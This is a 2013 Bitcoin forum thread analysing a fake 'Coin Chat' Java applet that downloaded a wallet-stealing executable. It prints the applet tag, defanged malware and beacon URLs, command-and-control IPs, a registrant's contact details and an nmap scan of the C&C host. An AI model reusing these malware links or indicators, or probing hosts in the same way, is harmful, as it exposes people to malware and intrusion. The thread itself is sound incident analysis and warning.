|
Title: deleted Post by: vipes2010 on April 19, 2013, 04:40:03 PM deleted
Title: Re: Java Exploited Encrypted Wallet File Post by: laanwj on April 19, 2013, 05:17:10 PM There are multiple possibilities:
- Weak passphrase - He still had an unencrypted copy of the wallet around on his system - An unencrypted copy of the wallet was still somewhere in the unallocated/deleted part of the file system (if the exploit scans the raw disk) - He did type the wallet passphrase (and it got keylogged) but forgot about it I'm sure that all problems with unencrypted keys staying behind in the wallet.dat are solved in 0.8.0 (in 0.6.0 already). When you encrypt, or upgrade from an older insecure version (versions 0.4.0 and 0.5.0rc), the wallet is re-written without any unencrypted keys remaining behind in the slack space of the database. Also, all keys that were in the wallet before encryption are marked so they will not be used anymore. If you're really paranoid about "unencrypted keys staying behind in unallocated space in the file system", an additional security mechanism is to send all your coins to a receiving address that is generated after the wallet is encrypted. Title: Re: Java Exploited Encrypted Wallet File Post by: Nicolai on April 19, 2013, 06:30:10 PM The webpage with the exploit: hXXp://coinchat.freetzi.com/blank.html
Code: <applet name='Coin Chat Client' width='900' height='450' code='wFidEABfB.class' archive='wFidEABfB.jar'></applet> The .jar contains: The malware: hXXp://fuskbugg.se/dl/f1adsy/smss2.exe (virustotal (https://www.virustotal.com/da/file/d274cc09f03047d03f228d4657e7ff7d7991daf835daa6eb015563c9dac33114/analysis/)) (I have sent the file to a lot of A/V vendors, so hopefully the detection rate will soon be better) And badly obfuscated "logger": Quote hXXp://galaxyjdb.com/insert.php?&o= OS.name &u=thewinner1234&ip= IP &e= paramString (could be some kind of pay-by-install ?)paramString can be "Noa", "Noc", "Yes", "Nod" (also "http" has been changed to "hXXp", just in case. NEVER click ANY of these links, unless you know what you're doing). EDIT1: The malware C&C server = service2012.no-ip.biz = 63.141.253.124 (port 91) coinchat.freetzi.com = 69.162.82.249 fuskbugg.se = 88.80.2.12 galaxyjdb.com = 109.163.233.106 galaxyjdb.com is owned by: Code: Quick Ware Alex B (sblfc1234@gmail.com) +44.7543642587 Fax: +1.5555555555 8 does it matter road Liverpool, merseyside l17 7ja GB EDIT2: The .jar exploit contain: Code: k{ol~puuly89: (Orpheu's skype = izroda6)Coded By Orpheu The Responsibility in the use of this is on the user not the coder And the C&C server is most likely made using this tutorial: http://www.hackforums.net/showthread.php?tid=145184 Title: Re: Java Exploited Encrypted Wallet File Post by: Mike Hearn on April 19, 2013, 06:35:55 PM As far as I could tell it's not an exploit - I didn't see any obviously tricky code. It just looks like a regular applet that downloads and runs an EXE file to me. The EXE itself claims to be a compiled AutoIt script so, again, I am skeptical it's very sophisticated. The guy in question said he was using Chrome but it looked like a chat app so he gave it full permissions.
Title: Re: Java Exploited Encrypted Wallet File Post by: interfect on April 20, 2013, 12:58:42 AM Holy Nmap Batman!
Code: $ nmap 63.141.253.124 Starting Nmap 6.00 ( http://nmap.org ) at 2013-04-19 17:58 PDT Nmap scan report for 63.141.253.124 Host is up (0.11s latency). Not shown: 973 closed ports PORT STATE SERVICE 22/tcp open ssh 25/tcp filtered smtp 80/tcp open http 135/tcp filtered msrpc 139/tcp filtered netbios-ssn 211/tcp filtered 914c-g 445/tcp filtered microsoft-ds 500/tcp filtered isakmp 513/tcp filtered login 666/tcp filtered doom 1100/tcp filtered mctp 1999/tcp filtered tcp-id-port 2000/tcp filtered cisco-sccp 2030/tcp filtered device2 3006/tcp filtered deslogind 3306/tcp open mysql 3814/tcp filtered neto-dcs 5000/tcp filtered upnp 6001/tcp filtered X11:1 7938/tcp filtered lgtomapper 8800/tcp filtered sunwebadmin 8888/tcp filtered sun-answerbook 9002/tcp filtered dynamid 9290/tcp filtered unknown 10215/tcp filtered unknown 40911/tcp filtered unknown 60020/tcp filtered unknown Nmap done: 1 IP address (1 host up) scanned in 18.23 seconds Title: Re: Java Exploited Encrypted Wallet File Post by: Nicolai on April 20, 2013, 11:40:56 PM Mike Hearn: You are right, it does not exploit any flaws in Java (just ask permission, download'n'run the malware).
Title: Re: Java Exploited Encrypted Wallet File Post by: K1773R on April 21, 2013, 12:23:04 AM As far as I could tell it's not an exploit - I didn't see any obviously tricky code. It just looks like a regular applet that downloads and runs an EXE file to me. The EXE itself claims to be a compiled AutoIt script so, again, I am skeptical it's very sophisticated. The guy in question said he was using Chrome but it looked like a chat app so he gave it full permissions. if someone provides the autoit binary, i decompile it ;)Title: Re: Java Exploited Encrypted Wallet File Post by: K1773R on April 22, 2013, 11:35:58 AM unfortunately the code has been obfuscated, but you can still find out what it does it just takes more time to understand it ;)
if someone is interested in it, send me a message and il send it to you (without the binary of course!). i dont want to host this code since its malware! |